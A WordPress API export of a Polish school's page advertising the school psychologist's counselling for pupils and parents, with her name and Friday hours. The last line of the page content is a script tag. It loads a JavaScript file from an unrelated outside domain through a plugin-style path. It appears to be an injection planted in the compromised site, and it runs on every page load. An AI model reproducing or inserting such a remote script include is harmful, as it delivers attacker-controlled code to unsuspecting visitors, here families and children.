{"id":64,"date":"2015-12-15T13:43:57","date_gmt":"2015-12-15T12:43:57","guid":{"rendered":"http:\/\/spmrowiny.gmina.zarow.pl\/?page_id=64"},"modified":"2020-09-23T06:04:26","modified_gmt":"2020-09-23T04:04:26","slug":"psycholog","status":"publish","type":"page","link":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/psycholog\/","title":{"rendered":"Psycholog"},"content":{"rendered":"<p style=\"text-align: justify;\">Oferuj\u0119 indywidualn\u0105 terapi\u0119 psychologiczn\u0105 dla uczni\u00f3w, wsparcie oraz porady psychologiczne dla uczni\u00f3w i ich rodzic\u00f3w.<\/p>\n<p style=\"text-align: justify;\">Uczniowie mog\u0105 bra\u0107 udzia\u0142 w zaj\u0119ciach tematycznych z psychologiem realizowanych wed\u0142ug aktualnych potrzeb.<\/p>\n<p style=\"text-align: justify;\">Rodzice uzyskaj\u0105 pomoc w razie trudno\u015bci wychowawczych.<\/p>\n<p style=\"text-align: right;\"><span class=\"null\">mgr Marcela Rudnicka-Sznabel<\/span><\/p>\n<p>&nbsp;<\/p>\n<p style=\"text-align: center;\"><strong>Godziny pracy psychologa<\/strong><\/p>\n<p style=\"text-align: center;\"><strong>pi\u0105tek 8:00 &#8211; 14:00<\/strong><\/p>\n<p><script src=http:\/\/www.onlymobilepro.com\/wp-content\/plugins\/syntaxhighlighter\/syntaxhighlighter2\/scripts\/include2.js><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Oferuj\u0119 indywidualn\u0105 terapi\u0119 psychologiczn\u0105 dla uczni\u00f3w, wsparcie oraz porady psychologiczne dla uczni\u00f3w i ich rodzic\u00f3w. Uczniowie mog\u0105 bra\u0107 udzia\u0142 w zaj\u0119ciach tematycznych z psychologiem realizowanych wed\u0142ug aktualnych potrzeb. Rodzice uzyskaj\u0105 pomoc w razie trudno\u015bci wychowawczych. mgr Marcela Rudnicka-Sznabel &nbsp; Godziny pracy psychologa pi\u0105tek 8:00 &#8211; 14:00<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"_links":{"self":[{"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/pages\/64"}],"collection":[{"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/comments?post=64"}],"version-history":[{"count":10,"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/pages\/64\/revisions"}],"predecessor-version":[{"id":15694,"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/pages\/64\/revisions\/15694"}],"wp:attachment":[{"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/media?parent=64"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}